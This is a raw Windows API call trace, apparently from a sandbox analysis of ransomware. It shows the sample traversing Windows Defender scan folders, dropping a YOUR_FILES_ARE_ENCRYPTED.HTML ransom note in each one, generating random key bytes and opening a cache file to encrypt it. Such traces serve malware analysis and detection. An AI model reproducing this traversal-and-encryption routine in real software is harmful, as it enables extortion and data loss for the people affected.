RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f29f8 [0107.479] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\cleanstore\\entries\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.480] WriteFile (in: hFile=0x32c, lpBuffer=0x6f29f8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6f29f8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.481] CloseHandle (hObject=0x32c) returned 1 [0107.481] GetProcessHeap () returned 0x600000 [0107.481] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f29f8 | out: hHeap=0x600000) returned 1 [0107.481] GetProcessHeap () returned 0x600000 [0107.481] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.482] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="ResourceData", cAlternateFileName="RESOUR~1")) returned 1 [0107.482] StrStrIW (lpFirst="ResourceData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.482] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData") returned 75 [0107.482] GetProcessHeap () returned 0x600000 [0107.482] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.483] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData" [0107.483] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\*" [0107.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0107.484] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.484] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 0 [0107.484] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0107.484] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0107.484] GetProcessHeap () returned 0x600000 [0107.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f29f8 [0107.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\cleanstore\\resourcedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.485] WriteFile (in: hFile=0x32c, lpBuffer=0x6f29f8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6f29f8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.485] CloseHandle (hObject=0x32c) returned 1 [0107.486] GetProcessHeap () returned 0x600000 [0107.486] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f29f8 | out: hHeap=0x600000) returned 1 [0107.486] GetProcessHeap () returned 0x600000 [0107.486] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.487] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="Resources", cAlternateFileName="RESOUR~2")) returned 1 [0107.487] StrStrIW (lpFirst="Resources", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.487] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources") returned 72 [0107.487] GetProcessHeap () returned 0x600000 [0107.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.488] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources" [0107.488] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\*" [0107.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0107.488] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.488] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 0 [0107.488] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0107.489] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0107.489] GetProcessHeap () returned 0x600000 [0107.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f29f8 [0107.489] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\cleanstore\\resources\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.489] WriteFile (in: hFile=0x32c, lpBuffer=0x6f29f8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6f29f8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.490] CloseHandle (hObject=0x32c) returned 1 [0107.491] GetProcessHeap () returned 0x600000 [0107.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f29f8 | out: hHeap=0x600000) returned 1 [0107.491] GetProcessHeap () returned 0x600000 [0107.491] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.492] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="Resources", cAlternateFileName="RESOUR~2")) returned 0 [0107.492] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.492] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0107.492] GetProcessHeap () returned 0x600000 [0107.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.492] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\CleanStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\cleanstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.494] WriteFile (in: hFile=0x314, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.494] CloseHandle (hObject=0x314) returned 1 [0107.495] GetProcessHeap () returned 0x600000 [0107.495] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.495] GetProcessHeap () returned 0x600000 [0107.495] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0107.496] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd06b4edd, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="History", cAlternateFileName="")) returned 1 [0107.496] StrStrIW (lpFirst="History", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.496] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History") returned 59 [0107.496] GetProcessHeap () returned 0x600000 [0107.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0107.498] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History" [0107.498] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*" [0107.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.500] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="..", cAlternateFileName="")) returned 1 [0107.500] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd06b4edd, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="CacheManager", cAlternateFileName="CACHEM~1")) returned 1 [0107.500] StrStrIW (lpFirst="CacheManager", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.500] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 72 [0107.500] GetProcessHeap () returned 0x600000 [0107.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.501] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0107.501] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*" [0107.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd06b4edd, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0107.502] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd06b4edd, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.502] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd06b4edd, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x4e000, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="MpScanCache-0.bin", cAlternateFileName="MPSCAN~1.BIN")) returned 1 [0107.502] StrStrIW (lpFirst="MpScanCache-0.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.502] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpScanCache-0.bin") returned 90 [0107.502] PathFindExtensionW (pszPath="MpScanCache-0.bin") returned=".bin" [0107.502] lstrlenW (lpString=".bin") returned 4 [0107.502] PathFindExtensionW (pszPath="MpScanCache-0.bin") returned=".bin" [0107.502] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0107.502] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpScanCache-0.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpscancache-0.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0107.502] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd06b4edd, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x4e000, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="MpScanCache-0.bin", cAlternateFileName="MPSCAN~1.BIN")) returned 0 [0107.502] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0107.502] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0107.502] GetProcessHeap () returned 0x600000 [0107.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f4a08 [0107.503] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.503] WriteFile (in: hFile=0x32c, lpBuffer=0x6f4a08*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6f4a08*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.504] CloseHandle (hObject=0x32c) returned 1 [0107.505] GetProcessHeap () returned 0x600000 [0107.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f4a08 | out: hHeap=0x600000) returned 1 [0107.505] GetProcessHeap () returned 0x600000 [0107.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.506] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="Mput", cAlternateFileName="")) returned 1 [0107.506] StrStrIW (lpFirst="Mput", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.506] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput") returned 64 [0107.506] GetProcessHeap () returned 0x600000 [0107.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.508] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput" [0107.508] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\*" [0107.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0107.509] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.509] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="MputHistory", cAlternateFileName="MPUTHI~1")) returned 1 [0107.509] StrStrIW (lpFirst="MputHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.509] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory") returned 76 [0107.509] GetProcessHeap () returned 0x600000 [0107.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 